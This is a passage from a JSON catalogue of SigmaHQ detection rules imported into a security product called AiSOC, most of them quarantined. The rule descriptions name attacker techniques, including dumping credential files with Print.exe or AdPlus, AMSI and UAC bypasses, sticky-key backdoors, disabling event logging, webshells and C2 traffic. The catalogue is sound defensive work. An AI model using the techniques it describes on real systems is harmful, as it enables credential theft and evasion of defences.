Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-performed-by-terminated-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml" } }, { "id": "sigmahq-sigma-2e69f167-47b5-4ae7-a390-47764529eff5", "type": "detection", "name": "Transferring Files with Credential Data via Network Shares - Zeek", "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.001", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/transferring-files-with-credential-data-via-network-shares-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e69f167-47b5-4ae7-a390-47764529eff5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" } }, { "id": "sigmahq-sigma-2ea44a60-cfda-11ea-87d0-0242ac130003", "type": "detection", "name": "Webshell ReGeorg Detection Via Web Logs", "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-regeorg-detection-via-web-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ea44a60-cfda-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_webshell_regeorg.yml" } }, { "id": "sigmahq-sigma-2f0bae2d-bf20-4465-be86-1311addebaa3", "type": "detection", "name": "Google Cloud Kubernetes Secrets Modified or Deleted", "description": "Identifies when the Secrets are Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "2f0bae2d-bf20-4465-be86-1311addebaa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2f211361-7dce-442d-b78a-c04039677378", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f211361-7dce-442d-b78a-c04039677378", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" } }, { "id": "sigmahq-sigma-2f575940-d85e-4ddc-af13-17dad6f1a0ef", "type": "detection", "name": "Github SSH Certificate Configuration Changed", "description": "Detects when changes are made to the SSH certificate configuration of the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-ssh-certificate-configuration-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f575940-d85e-4ddc-af13-17dad6f1a0ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_ssh_certificate_config_changed.yml" } }, { "id": "sigmahq-sigma-2f77047c-e6e9-4c11-b088-a3de399524cd", "type": "detection", "name": "Potential Persistence Via Security Descriptors - ScriptBlock", "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-security-descriptors-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml" } }, { "id": "sigmahq-sigma-2f78da12-f7c7-430b-8b19-a28f269b77a3", "type": "detection", "name": "Disable Windows Event Logging Via Registry", "description": "Detects tampering with the \"Enabled\" registry 
key in order to disable Windows logging of a Windows event channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-event-logging-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" } }, { "id": "sigmahq-sigma-2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "type": "detection", "name": "Potential DCOM InternetExplorer.Application DLL Hijack", "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dcom-internetexplorer-application-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-2f869d59-7f6a-4931-992c-cce556ff2d53", "type": "detection", "name": "Potential Adplus.EXE Abuse", "description": "Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-adplus-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" } }, { "id": "sigmahq-sigma-2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "type": "detection", "name": "CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module", "description": "Detects loaded kernel modules that did not meet the WHQL signing requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unmet-whql-requirements-for-loaded-kernel-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" } }, { "id": "sigmahq-sigma-2f9356ae-bf43-41b8-b858-4496d83b2acb", "type": "detection", "name": "ISO File Created Within Temp Folders", "description": "Detects the creation of an ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-file-created-within-temp-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iso_file_mount.yml" } }, { "id": "sigmahq-sigma-2fade0b6-7423-4835-9d4f-335b39b83867", "type": "detection", "name": "Shell Execution Of Process Located In Tmp Directory", "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-of-process-located-in-tmp-directory.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fade0b6-7423-4835-9d4f-335b39b83867", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" } }, { "id": "sigmahq-sigma-2fbbe9ff-0afc-470b-bdc0-592198339968", "type": "detection", "name": "Remote Access Tool - Potential MeshAgent Execution - Windows", "description": "Detects potential execution of MeshAgent which is a tool used for remote access.\nHistorical data shows that threat actors rename MeshAgent binary to evade detection.\nMatching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-potential-meshagent-execution-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fbbe9ff-0afc-470b-bdc0-592198339968", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_arguments.yml" } }, { "id": "sigmahq-sigma-2fcda7e2-8c57-4904-86ac-37fc3157e09d", "type": "detection", "name": "Sensitive File Dump Via Print.EXE", "description": "Detects the abuse of the Print.exe utility for 
credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003", "T1003.002", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-dump-via-print-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fcda7e2-8c57-4904-86ac-37fc3157e09d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_print_dump_sensitive_files.yml" } }, { "id": "sigmahq-sigma-2fdaf50b-9fd5-449f-ba69-f17248119af6", "type": "detection", "name": "Network Connection Initiated via Finger.EXE", "description": "Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\nIn one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\nSince the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\nInvestigating such network connections can also help identify potential malicious infrastructure used by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/network-connection-initiated-via-finger-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fdaf50b-9fd5-449f-ba69-f17248119af6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_finger.yml" } }, { "id": "sigmahq-sigma-2fdefcb3-dbda-401e-ae23-f0db027628bc", "type": "detection", "name": "Sticky Key Like Backdoor Execution", "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sticky-key-like-backdoor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" } }, { "id": "sigmahq-sigma-2ff692c2-4594-41ec-8fcb-46587de769e0", "type": "detection", "name": "CrashControl CrashDump Disabled", "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1564", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crashcontrol-crashdump-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ff692c2-4594-41ec-8fcb-46587de769e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" } }, { "id": "sigmahq-sigma-300bac00-e041-4ee2-9c36-e262656a6ecc", "type": "detection", "name": "Active Directory User Backdoors", "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-user-backdoors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" } }, { "id": "sigmahq-sigma-3037d961-21e9-4732-b27a-637bcc7bf539", "type": "detection", "name": "Suspicious High IntegrityLevel Conhost Legacy Option", "description": "ForceV1 asks for information directly from the kernel space. 
Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-high-integritylevel-conhost-legacy-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3037d961-21e9-4732-b27a-637bcc7bf539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" } }, { "id": "sigmahq-sigma-304810ed-8853-437f-9e36-c4975c3dfd7e", "type": "detection", "name": "HackTool - BabyShark Agent Default URL Pattern", "description": "Detects Baby Shark C2 Framework default communication patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-babyshark-agent-default-url-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "304810ed-8853-437f-9e36-c4975c3dfd7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml" } }, { "id": "sigmahq-sigma-304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "type": "detection", "name": "PSEXEC Remote Execution File Artefact", "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1543.003", "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-remote-execution-file-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml" } }, { "id": "sigmahq-sigma-30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "type": "detection", "name": "Renamed Powershell Under Powershell Channel", "description": "Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-powershell-under-powershell-channel.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" } }, { "id": "sigmahq-sigma-30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "type": "detection", "name": "File Deletion", "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/file-deletion.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" } }, { "id": "sigmahq-sigma-30bcce26-51c5-49f2-99c8-7b59e3af36c7", "type": "detection", "name": "Execution Of Script Located In Potentially Suspicious Directory", "description": "Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/execution-of-script-located-in-potentially-suspicious-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30bcce26-51c5-49f2-99c8-7b59e3af36c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" } }, { "id": "sigmahq-sigma-30bf1789-379d-4fdc-900f-55cd0a90a801", "type": "detection", "name": "Visual Studio Code Tunnel Service Installation", "description": "Detects the installation of VsCode tunnel (code-tunnel) as a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30bf1789-379d-4fdc-900f-55cd0a90a801", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml" } }, { "id": "sigmahq-sigma-30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "type": "detection", "name": "Renamed BOINC Client Execution", "description": "Detects the execution of a renamed BOINC binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553" 
], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-boinc-client-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_boinc.yml" } }, { "id": "sigmahq-sigma-30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "type": "detection", "name": "Hidden Powershell in Link File Pattern", "description": "Detects events that appear when a user click on a link file with a powershell command in it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-powershell-in-link-file-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml" } }, { "id": "sigmahq-sigma-30edb182-aa75-42c0-b0a9-e998bb29067c", "type": "detection", "name": "Potential AMSI Bypass Via .NET Reflection", "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-via-net-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml" } }, { "id": "sigmahq-sigma-30fc8de7-d833-40c4-96b6-28319fbc4f6c", "type": "detection", "name": "UAC Bypass Using Event Viewer RecentViews", "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-event-viewer-recentviews.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" } }, { "id": "sigmahq-sigma-3109530e-ab47-4cc6-a953-cac5ebcc93ae", "type": "detection", "name": "ADS Zone.Identifier Deleted By Uncommon Application", "description": "Detects the 
